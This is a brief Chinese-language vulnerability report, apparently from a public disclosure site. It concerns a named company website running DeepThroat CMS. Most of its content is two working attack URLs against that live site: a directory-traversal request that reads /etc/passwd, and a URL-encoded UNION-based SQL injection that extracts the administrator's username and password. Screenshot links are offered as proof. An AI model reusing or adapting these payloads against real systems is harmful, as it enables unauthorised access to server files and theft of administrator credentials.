### 简要描述:
目标:http://www.coremail.cn/
程序:深喉咙CMS
存在SQL注入,任意文件读取漏洞,可能有人早发现了,没人发我就来发一下。
### 详细说明:
http://www.coremail.cn/?p=1&m=/../../../../../../../../../etc/passwd
读取服务器/etc/passwd文件
http://www.coremail.cn/?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23
得到管理员用户名和密码
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201204/0816025200aa2a1dd068cd64fdb3be0e6ce4b371.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/0816025200aa2a1dd068cd64fdb3be0e6ce4b371.jpg)
[<img src="https://images.seebug.org/upload/201204/0816023667cb86e83753a646628962f4f611a222.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201204/0816023667cb86e83753a646628962f4f611a222.jpg)
暂无评论